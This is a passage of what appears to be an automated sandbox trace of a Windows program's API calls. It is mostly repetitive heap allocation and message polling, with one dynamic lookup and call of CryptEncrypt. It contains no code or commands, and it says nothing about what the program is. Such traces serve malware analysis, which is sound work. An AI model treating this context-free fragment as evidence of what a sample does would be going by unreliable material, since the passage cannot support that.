Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.372] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.372] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0198.372] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.373] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.373] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.373] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.374] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.374] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0198.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.376] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.376] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.376] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.377] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.386] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4828 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9f48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.391] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0198.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0198.392] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x13e7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x13e8) returned 1 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.393] RtlAllocateHeap 